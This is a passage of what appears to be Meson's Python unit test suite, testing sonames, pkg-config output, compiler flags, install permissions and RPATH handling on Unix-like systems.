-L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'} self.init(testdir, override_envvars=env) @unittest.skipUnless(not is_windows(), "requires something Unix-like") class LinuxlikeTests(BasePlatformTests): ''' Tests that should run on Linux, macOS, and *BSD ''' def test_basic_soname(self): ''' Test that the soname is set correctly for shared libraries. This can't be an ordinary test case because we need to run `readelf` and actually check the soname. https://github.com/mesonbuild/meson/issues/785 ''' testdir = os.path.join(self.common_test_dir, '4 shared') self.init(testdir) self.build() lib1 = os.path.join(self.builddir, 'libmylib.so') soname = get_soname(lib1) self.assertEqual(soname, 'libmylib.so') def test_custom_soname(self): ''' Test that the soname is set correctly for shared libraries when a custom prefix and/or suffix is used. This can't be an ordinary test case because we need to run `readelf` and actually check the soname. https://github.com/mesonbuild/meson/issues/785 ''' testdir = os.path.join(self.common_test_dir, '25 library versions') self.init(testdir) self.build() lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix') soname = get_soname(lib1) self.assertEqual(soname, 'prefixsomelib.suffix') def test_pic(self): ''' Test that -fPIC is correctly added to static libraries when b_staticpic is true and not when it is false. This can't be an ordinary test case because we need to inspect the compiler database. ''' if is_windows() or is_cygwin() or is_osx(): raise unittest.SkipTest('PIC not relevant') testdir = os.path.join(self.common_test_dir, '3 static') self.init(testdir) compdb = self.get_compdb() self.assertIn('-fPIC', compdb[0]['command']) self.setconf('-Db_staticpic=false') # Regenerate build self.build() compdb = self.get_compdb() self.assertNotIn('-fPIC', compdb[0]['command']) @mock.patch.dict(os.environ) def test_pkgconfig_gen(self): ''' Test that generated pkg-config files can be found and have the correct version and link args. This can't be an ordinary test case because we need to run pkg-config outside of a Meson build file. 
https://github.com/mesonbuild/meson/issues/889 ''' testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) env = get_fake_env(testdir, self.builddir, self.prefix) kwargs = {'required': True, 'silent': True} os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir foo_dep = PkgConfigDependency('libfoo', env, kwargs) self.assertTrue(foo_dep.found()) self.assertEqual(foo_dep.get_version(), '1.0') self.assertIn('-lfoo', foo_dep.get_link_args()) self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar') self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data') libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs) self.assertTrue(libhello_nolib.found()) self.assertEqual(libhello_nolib.get_link_args(), []) self.assertEqual(libhello_nolib.get_compile_args(), []) self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar') def test_pkgconfig_gen_deps(self): ''' Test that generated pkg-config files correctly handle dependencies ''' testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) privatedir1 = self.privatedir self.new_builddir() testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies') self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1}) privatedir2 = self.privatedir env = { 'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]), 'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib', } self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env) # pkg-config strips some duplicated flags so we have to parse the # generated file ourself. expected = { 'Requires': 'libexposed', 'Requires.private': 'libfoo >= 1.0', 'Libs': '-L${libdir} -llibmain -pthread -lcustom', 'Libs.private': '-lcustom2 -L${libdir} -llibinternal', 'Cflags': '-I${includedir} -pthread -DCUSTOM', } if is_osx() or is_haiku(): expected['Cflags'] = expected['Cflags'].replace('-pthread ', '') with open(os.path.join(privatedir2, 'dependency-test.pc')) as f: matched_lines = 0 for line in f: parts = line.split(':', 1) if parts[0] in expected: key = parts[0] val = parts[1].strip() expected_val = expected[key] self.assertEqual(expected_val, val) matched_lines += 1 self.assertEqual(len(expected), matched_lines) cmd = ['pkg-config', 'requires-test'] out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n') if not is_openbsd(): self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello'])) else: self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello'])) cmd = ['pkg-config', 'requires-private-test'] out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n') if not is_openbsd(): self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello'])) else: self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello'])) cmd = ['pkg-config', 'pub-lib-order'] out = self._run(cmd + ['--libs'], override_envvars=env).strip().split() self.assertEqual(out, ['-llibmain2', '-llibinternal']) # See common/45 pkgconfig-gen/meson.build for description of the case this test with open(os.path.join(privatedir1, 'simple2.pc')) as f: content = f.read() self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content) self.assertIn('Libs.private: -lz', content) with open(os.path.join(privatedir1, 'simple3.pc')) as f: content = f.read() self.assertEqual(1, content.count('-lsimple3')) with open(os.path.join(privatedir1, 'simple5.pc')) as f: content = f.read() 
self.assertNotIn('-lstat2', content) @mock.patch.dict(os.environ) def test_pkgconfig_uninstalled(self): testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) self.build() os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled') if is_cygwin(): os.environ['PATH'] += os.pathsep + self.builddir self.new_builddir() testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies') self.init(testdir) self.build() self.run_tests() def test_pkg_unfound(self): testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig') self.init(testdir) with open(os.path.join(self.privatedir, 'somename.pc')) as f: pcfile = f.read() self.assertFalse('blub_blob_blib' in pcfile) def test_vala_c_warnings(self): ''' Test that no warnings are emitted for C code generated by Vala. This can't be an ordinary test case because we need to inspect the compiler database. https://github.com/mesonbuild/meson/issues/864 ''' if not shutil.which('valac'): raise unittest.SkipTest('valac not installed.') testdir = os.path.join(self.vala_test_dir, '5 target glib') self.init(testdir) compdb = self.get_compdb() vala_command = None c_command = None for each in compdb: if each['file'].endswith('GLib.Thread.c'): vala_command = each['command'] elif each['file'].endswith('GLib.Thread.vala'): continue elif each['file'].endswith('retcode.c'): c_command = each['command'] else: m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file']) raise AssertionError(m) self.assertIsNotNone(vala_command) self.assertIsNotNone(c_command) # -w suppresses all warnings, should be there in Vala but not in C self.assertIn(" -w ", vala_command) self.assertNotIn(" -w ", c_command) # -Wall enables all warnings, should be there in C but not in Vala self.assertNotIn(" -Wall ", vala_command) self.assertIn(" -Wall ", c_command) # -Werror converts warnings to errors, should always be there since it's # injected by an unrelated piece of code and the project has werror=true self.assertIn(" -Werror ", vala_command) self.assertIn(" -Werror ", c_command) @skipIfNoPkgconfig def test_qtdependency_pkgconfig_detection(self): ''' Test that qt4 and qt5 detection with pkgconfig works. ''' # Verify Qt4 or Qt5 can be found with pkg-config qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore']) qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core']) testdir = os.path.join(self.framework_test_dir, '4 qt') self.init(testdir, extra_args=['-Dmethod=pkg-config']) # Confirm that the dependency was found with pkg-config mesonlog = self.get_meson_log() if qt4 == 0: self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n') if qt5 == 0: self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n') @skip_if_not_base_option('b_sanitize') def test_generate_gir_with_address_sanitizer(self): if is_cygwin(): raise unittest.SkipTest('asan not available on Cygwin') if is_openbsd(): raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD') testdir = os.path.join(self.framework_test_dir, '7 gnome') self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false']) self.build() def test_qt5dependency_qmake_detection(self): ''' Test that qt5 detection with qmake works. This can't be an ordinary test case because it involves setting the environment. 
''' # Verify that qmake is for Qt5 if not shutil.which('qmake-qt5'): if not shutil.which('qmake'): raise unittest.SkipTest('QMake not found') output = subprocess.getoutput('qmake --version') if 'Qt version 5' not in output: raise unittest.SkipTest('Qmake found, but it is not for Qt 5.') # Disable pkg-config codepath and force searching with qmake/qmake-qt5 testdir = os.path.join(self.framework_test_dir, '4 qt') self.init(testdir, extra_args=['-Dmethod=qmake']) # Confirm that the dependency was found with qmake mesonlog = self.get_meson_log() self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n') def glob_sofiles_without_privdir(self, g): files = glob(g) return [f for f in files if not f.endswith('.p')] def _test_soname_impl(self, libpath, install): if is_cygwin() or is_osx(): raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames') testdir = os.path.join(self.unit_test_dir, '1 soname') self.init(testdir) self.build() if install: self.install() # File without aliases set. nover = os.path.join(libpath, 'libnover.so') self.assertPathExists(nover) self.assertFalse(os.path.islink(nover)) self.assertEqual(get_soname(nover), 'libnover.so') self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1) # File with version set verset = os.path.join(libpath, 'libverset.so') self.assertPathExists(verset + '.4.5.6') self.assertEqual(os.readlink(verset), 'libverset.so.4') self.assertEqual(get_soname(verset), 'libverset.so.4') self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3) # File with soversion set soverset = os.path.join(libpath, 'libsoverset.so') self.assertPathExists(soverset + '.1.2.3') self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3') self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3') self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2) # File with version and soversion set to same values settosame = os.path.join(libpath, 'libsettosame.so') self.assertPathExists(settosame + '.7.8.9') self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9') self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9') self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2) # File with version and soversion set to different values bothset = os.path.join(libpath, 'libbothset.so') self.assertPathExists(bothset + '.1.2.3') self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3') self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6') self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3') self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3) def test_soname(self): self._test_soname_impl(self.builddir, False) def test_installed_soname(self): libdir = self.installdir + os.path.join(self.prefix, self.libdir) self._test_soname_impl(libdir, True) def test_compiler_check_flags_order(self): ''' Test that compiler check flags override all other flags. This can't be an ordinary test case because it needs the environment to be set. 
''' testdir = os.path.join(self.common_test_dir, '37 has function') env = get_fake_env(testdir, self.builddir, self.prefix) cpp = env.detect_cpp_compiler(MachineChoice.HOST) Oflag = '-O3' OflagCPP = Oflag if cpp.get_id() in ('clang', 'gcc'): # prevent developers from adding "int main(int argc, char **argv)" # to small Meson checks unless these parameters are actually used OflagCPP += ' -Werror=unused-parameter' env = {'CFLAGS': Oflag, 'CXXFLAGS': OflagCPP} self.init(testdir, override_envvars=env) cmds = self.get_meson_log_compiler_checks() for cmd in cmds: if cmd[0] == 'ccache': cmd = cmd[1:] # Verify that -I flags from the `args` kwarg are first # This is set in the '37 has function' test case self.assertEqual(cmd[1], '-I/tmp') # Verify that -O3 set via the environment is overridden by -O0 Oargs = [arg for arg in cmd if arg.startswith('-O')] self.assertEqual(Oargs, [Oflag, '-O0']) def _test_stds_impl(self, testdir, compiler, p: str): has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0')) has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0')) has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0')) # Check that all the listed -std=xxx options for this compiler work just fine when used # https://en.wikipedia.org/wiki/Xcode#Latest_versions # https://www.gnu.org/software/gcc/projects/cxx-status.html for v in compiler.get_options()['std'].choices: lang_std = p + '_std' # we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly # thus, C++ first if '++17' in v and not has_cpp17: continue elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support continue # now C elif '17' in v and not has_cpp2a_c17: continue elif '18' in v and not has_c18: continue std_opt = '{}={}'.format(lang_std, v) self.init(testdir, extra_args=['-D' + std_opt]) cmd = self.get_compdb()[0]['command'] # c++03 and gnu++03 are not understood by ICC, don't try to look for them skiplist = frozenset([ ('intel', 'c++03'), ('intel', 'gnu++03')]) if v != 'none' and not (compiler.get_id(), v) in skiplist: cmd_std = " -std={} ".format(v) self.assertIn(cmd_std, cmd) try: self.build() except Exception: print('{} was {!r}'.format(lang_std, v)) raise self.wipe() # Check that an invalid std option in CFLAGS/CPPFLAGS fails # Needed because by default ICC ignores invalid options cmd_std = '-std=FAIL' if p == 'c': env_flag_name = 'CFLAGS' elif p == 'cpp': env_flag_name = 'CXXFLAGS' else: raise NotImplementedError('Language {} not defined.'.format(p)) env = {} env[env_flag_name] = cmd_std with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException), msg='C compiler should have failed with -std=FAIL'): self.init(testdir, override_envvars = env) # ICC won't fail in the above because additional flags are needed to # make unknown -std=... options errors. self.build() def test_compiler_c_stds(self): ''' Test that C stds specified for this compiler can all be used. Can't be an ordinary test because it requires passing options to meson. 
''' testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) self._test_stds_impl(testdir, cc, 'c') def test_compiler_cpp_stds(self): ''' Test that C++ stds specified for this compiler can all be used. Can't be an ordinary test because it requires passing options to meson. ''' testdir = os.path.join(self.common_test_dir, '2 cpp') env = get_fake_env(testdir, self.builddir, self.prefix) cpp = env.detect_cpp_compiler(MachineChoice.HOST) self._test_stds_impl(testdir, cpp, 'cpp') def test_unity_subproj(self): testdir = os.path.join(self.common_test_dir, '43 subproject') self.init(testdir, extra_args='--unity=subprojects') pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p')) self.assertEqual(len(pdirs), 1) self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c')) sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p')) self.assertEqual(len(sdirs), 1) self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c')) self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c')) self.build() def test_installed_modes(self): ''' Test that files installed by these tests have the correct permissions. Can't be an ordinary test because our installed_files.txt is very basic. ''' # Test file modes testdir = os.path.join(self.common_test_dir, '12 data') self.init(testdir) self.install() f = os.path.join(self.installdir, 'etc', 'etcfile.dat') found_mode = stat.filemode(os.stat(f).st_mode) want_mode = 'rw------T' self.assertEqual(want_mode, found_mode[1:]) f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh') statf = os.stat(f) found_mode = stat.filemode(statf.st_mode) want_mode = 'rwxr-sr-x' self.assertEqual(want_mode, found_mode[1:]) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_uid) self.assertEqual(0, statf.st_gid) f = os.path.join(self.installdir, 'usr', 'share', 'progname', 'fileobject_datafile.dat') orig = os.path.join(testdir, 'fileobject_datafile.dat') statf = os.stat(f) statorig = os.stat(orig) found_mode = stat.filemode(statf.st_mode) orig_mode = stat.filemode(statorig.st_mode) self.assertEqual(orig_mode[1:], found_mode[1:]) self.assertEqual(os.getuid(), statf.st_uid) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_gid) self.wipe() # Test directory modes testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) self.install() f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat') statf = os.stat(f) found_mode = stat.filemode(statf.st_mode) want_mode = 'rwxr-x--t' self.assertEqual(want_mode, found_mode[1:]) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_uid) def test_installed_modes_extended(self): ''' Test that files are installed with correct permissions using install_mode. 
''' testdir = os.path.join(self.common_test_dir, '191 install_mode') self.init(testdir) self.build() self.install() for fsobj, want_mode in [ ('bin', 'drwxr-x---'), ('bin/runscript.sh', '-rwxr-sr-x'), ('bin/trivialprog', '-rwxr-sr-x'), ('include', 'drwxr-x---'), ('include/config.h', '-rw-rwSr--'), ('include/rootdir.h', '-r--r--r-T'), ('lib', 'drwxr-x---'), ('lib/libstat.a', '-rw---Sr--'), ('share', 'drwxr-x---'), ('share/man', 'drwxr-x---'), ('share/man/man1', 'drwxr-x---'), ('share/man/man1/foo.1', '-r--r--r-T'), ('share/sub1', 'drwxr-x---'), ('share/sub1/second.dat', '-rwxr-x--t'), ('subdir', 'drwxr-x---'), ('subdir/data.dat', '-rw-rwSr--'), ]: f = os.path.join(self.installdir, 'usr', *fsobj.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (fsobj, want_mode, found_mode))) # Ensure that introspect --installed works on all types of files # FIXME: also verify the files list self.introspect('--installed') def test_install_umask(self): ''' Test that files are installed with correct permissions using default install umask of 022, regardless of the umask at time the worktree was checked out or the build was executed. ''' # Copy source tree to a temporary directory and change permissions # there to simulate a checkout with umask 002. orig_testdir = os.path.join(self.unit_test_dir, '26 install umask') # Create a new testdir under tmpdir. tmpdir = os.path.realpath(tempfile.mkdtemp()) self.addCleanup(windows_proof_rmtree, tmpdir) testdir = os.path.join(tmpdir, '26 install umask') # Copy the tree using shutil.copyfile, which will use the current umask # instead of preserving permissions of the old tree. save_umask = os.umask(0o002) self.addCleanup(os.umask, save_umask) shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile) # Preserve the executable status of subdir/sayhello though. os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775) self.init(testdir) # Run the build under a 027 umask now. os.umask(0o027) self.build() # And keep umask 027 for the install step too. self.install() for executable in [ 'bin/prog', 'share/subdir/sayhello', ]: f = os.path.join(self.installdir, 'usr', *executable.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = '-rwxr-xr-x' self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (executable, want_mode, found_mode))) for directory in [ 'usr', 'usr/bin', 'usr/include', 'usr/share', 'usr/share/man', 'usr/share/man/man1', 'usr/share/subdir', ]: f = os.path.join(self.installdir, *directory.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = 'drwxr-xr-x' self.assertEqual(want_mode, found_mode, msg=('Expected directory %s to have mode %s but found %s instead.' % (directory, want_mode, found_mode))) for datafile in [ 'include/sample.h', 'share/datafile.cat', 'share/file.dat', 'share/man/man1/prog.1', 'share/subdir/datafile.dog', ]: f = os.path.join(self.installdir, 'usr', *datafile.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = '-rw-r--r--' self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (datafile, want_mode, found_mode))) def test_cpp_std_override(self): testdir = os.path.join(self.unit_test_dir, '6 std override') self.init(testdir) compdb = self.get_compdb() # Don't try to use -std=c++03 as a check for the # presence of a compiler flag, as ICC does not # support it. 
for i in compdb: if 'prog98' in i['file']: c98_comp = i['command'] if 'prog11' in i['file']: c11_comp = i['command'] if 'progp' in i['file']: plain_comp = i['command'] self.assertNotEqual(len(plain_comp), 0) self.assertIn('-std=c++98', c98_comp) self.assertNotIn('-std=c++11', c98_comp) self.assertIn('-std=c++11', c11_comp) self.assertNotIn('-std=c++98', c11_comp) self.assertNotIn('-std=c++98', plain_comp) self.assertNotIn('-std=c++11', plain_comp) # Now werror self.assertIn('-Werror', plain_comp) self.assertNotIn('-Werror', c98_comp) def test_run_installed(self): if is_cygwin() or is_osx(): raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable') testdir = os.path.join(self.unit_test_dir, '7 run installed') self.init(testdir) self.build() self.install() installed_exe = os.path.join(self.installdir, 'usr/bin/prog') installed_libdir = os.path.join(self.installdir, 'usr/foo') installed_lib = os.path.join(installed_libdir, 'libfoo.so') self.assertTrue(os.path.isfile(installed_exe)) self.assertTrue(os.path.isdir(installed_libdir)) self.assertTrue(os.path.isfile(installed_lib)) # Must fail when run without LD_LIBRARY_PATH to ensure that # rpath has been properly stripped rather than pointing to the builddir. self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0) # When LD_LIBRARY_PATH is set it should start working. # For some reason setting LD_LIBRARY_PATH in os.environ fails # when all tests are run (but works when only this test is run), # but doing this explicitly works. env = os.environ.copy() env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')]) self.assertEqual(subprocess.call(installed_exe, env=env), 0) # Ensure that introspect --installed works installed = self.introspect('--installed') for v in installed.values(): self.assertTrue('prog' in v or 'foo' in v) @skipIfNoPkgconfig def test_order_of_l_arguments(self): testdir = os.path.join(self.unit_test_dir, '8 -L -l order') self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir}) # NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders # the flags before returning them to -Lfoo -Lbar -lfoo -lbar # but pkgconf seems to not do that. Sigh. Support both. expected_order = [('-L/me/first', '-lfoo1'), ('-L/me/second', '-lfoo2'), ('-L/me/first', '-L/me/second'), ('-lfoo1', '-lfoo2'), ('-L/me/second', '-L/me/third'), ('-L/me/third', '-L/me/fourth',), ('-L/me/third', '-lfoo3'), ('-L/me/fourth', '-lfoo4'), ('-lfoo3', '-lfoo4'), ] with open(os.path.join(self.builddir, 'build.ninja')) as ifile: for line in ifile: if expected_order[0][0] in line: for first, second in expected_order: self.assertLess(line.index(first), line.index(second)) return raise RuntimeError('Linker entries not found in the Ninja file.') def test_introspect_dependencies(self): ''' Tests that mesonintrospect --dependencies returns expected output. 
''' testdir = os.path.join(self.framework_test_dir, '7 gnome') self.init(testdir) glib_found = False gobject_found = False deps = self.introspect('--dependencies') self.assertIsInstance(deps, list) for dep in deps: self.assertIsInstance(dep, dict) self.assertIn('name', dep) self.assertIn('compile_args', dep) self.assertIn('link_args', dep) if dep['name'] == 'glib-2.0': glib_found = True elif dep['name'] == 'gobject-2.0': gobject_found = True self.assertTrue(glib_found) self.assertTrue(gobject_found) if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0: raise unittest.SkipTest('glib >= 2.56.2 needed for the rest') targets = self.introspect('--targets') docbook_target = None for t in targets: if t['name'] == 'generated-gdbus-docbook': docbook_target = t break self.assertIsInstance(docbook_target, dict) self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0])) def test_introspect_installed(self): testdir = os.path.join(self.linuxlike_test_dir, '7 library versions') self.init(testdir) install = self.introspect('--installed') install = {os.path.basename(k): v for k, v in install.items()} print(install) if is_osx(): the_truth = { 'libmodule.dylib': '/usr/lib/libmodule.dylib', 'libnoversion.dylib': '/usr/lib/libnoversion.dylib', 'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib', 'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib', 'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib', 'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib', 'libsome.0.dylib': '/usr/lib/libsome.0.dylib', 'libsome.dylib': '/usr/lib/libsome.dylib', } the_truth_2 = {'/usr/lib/libsome.dylib', '/usr/lib/libsome.0.dylib', } else: the_truth = { 'libmodule.so': '/usr/lib/libmodule.so', 'libnoversion.so': '/usr/lib/libnoversion.so', 'libonlysoversion.so': '/usr/lib/libonlysoversion.so', 'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5', 'libonlyversion.so': '/usr/lib/libonlyversion.so', 'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1', 'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5', 'libsome.so': '/usr/lib/libsome.so', 'libsome.so.0': '/usr/lib/libsome.so.0', 'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3', } the_truth_2 = {'/usr/lib/libsome.so', '/usr/lib/libsome.so.0', '/usr/lib/libsome.so.1.2.3'} self.assertDictEqual(install, the_truth) targets = self.introspect('--targets') for t in targets: if t['name'] != 'some': continue self.assertSetEqual(the_truth_2, set(t['install_filename'])) def test_build_rpath(self): if is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') testdir = os.path.join(self.unit_test_dir, '10 build_rpath') self.init(testdir) self.build() # C program RPATH build_rpath = get_rpath(os.path.join(self.builddir, 'prog')) self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar') self.install() install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog')) self.assertEqual(install_rpath, '/baz') # C++ program RPATH build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx')) self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar') self.install() install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx')) self.assertEqual(install_rpath, 'baz') def test_global_rpath(self): if is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') if is_osx(): raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)') testdir = 
os.path.join(self.unit_test_dir, '81 global-rpath') oldinstalldir = self.installdir # Build and install an external library without DESTDIR. # The external library generates a .pc file without an rpath. yonder_dir = os.path.join(testdir, 'yonder') yonder_prefix = os.path.join(oldinstalldir, 'yonder') yonder_libdir = os.path.join(yonder_prefix, self.libdir) self.prefix = yonder_prefix self.installdir = yonder_prefix self.init(yonder_dir) self.build() self.install(use_destdir=False) # Since rpath has multiple valid formats we need to # test that they are all properly used. rpath_formats = [ ('-Wl,-rpath=', False), ('-Wl,-rpath,', False), ('-Wl,--just-symbols=', True), ('-Wl,--just-symbols,', True), ('-Wl,-R', False), ('-Wl,-R,', False) ] for rpath_format, exception in rpath_formats: # Build an app that uses that installed library. # Supply the rpath to the installed library via LDFLAGS # (as systems like buildroot and guix are wont to do) # and verify install preserves that rpath. self.new_builddir() env = {'LDFLAGS': rpath_format + yonder_libdir, 'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')} if exception: with self.assertRaises(subprocess.CalledProcessError): self.init(testdir, override_envvars=env) continue self.init(testdir, override_envvars=env) self.build() self.install(use_destdir=False) got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified')) self.assertEqual(got_rpath, yonder_libdir, rpath_format) @skip_if_not_base_option('b_sanitize') def test_pch_with_address_sanitizer(self): if is_cygwin(): raise unittest.SkipTest('asan not available on Cygwin') if is_openbsd(): raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD') testdir = os.path.join(self.common_test_dir, '13 pch') self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false']) self.build() compdb = self.get_compdb() for i in compdb: self.assertIn("-fsanitize=address", i["command"]) def test_cross_find_program(self): testdir = os.path.join(self.unit_test_dir, '11 cross prog') crossfile = tempfile.NamedTemporaryFile(mode='w') print(os.path.join(testdir, 'some_cross_tool.py')) tool_path = os.path.join(testdir, 'some_cross_tool.py') crossfile.write(textwrap.dedent(f'''\ [binaries] c = '{shutil.which('gcc' if is_sunos() else 'cc')}' ar = '{shutil.which('ar')}' strip = '{shutil.which('strip')}' sometool.py = ['{tool_path}'] someothertool.py = '{tool_path}' [properties] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' # Not sure if correct. endian = 'little' ''')) crossfile.flush() self.meson_cross_file = crossfile.name self.init(testdir) def test_reconfigure(self): testdir = os.path.join(self.unit_test_dir, '13 reconfigure') self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False) self.build('reconfigure') def test_vala_generated_source_buildir_inside_source_tree(self): ''' Test that valac outputs generated C files in the expected location when the builddir is a subdir of the source tree. 
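The test project is copied into the build area and then configured from a nested 'subdir/_build' directory inside that copy.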
''' if not shutil.which('valac'): raise unittest.SkipTest('valac not installed.') testdir = os.path.join(self.vala_test_dir, '8 generated sources') newdir = os.path.join(self.builddir, 'srctree') shutil.copytree(testdir, newdir) testdir = newdir # New builddir builddir = os.path.join(testdir, 'subdir/_build') os.makedirs(builddir, exist_ok=True) self.change_builddir(builddir) self.init(testdir) self.build() def test_old_gnome_module_codepaths(self): ''' A lot of code in the GNOME module is conditional on the version of the glib tools that are installed, and breakages in the old code can slip by once the CI has a newer glib version. So we force the GNOME module to pretend that it's running on an ancient glib so the fallback code is also tested. ''' testdir = os.path.join(self.framework_test_dir, '7 gnome') mesonbuild.modules.gnome.native_glib_version = '2.20' env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"} try: self.init(testdir, inprocess=True, override_envvars=env) self.build(override_envvars=env) finally: mesonbuild.modules.gnome.native_glib_version = None @skipIfNoPkgconfig def test_pkgconfig_usage(self): testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig 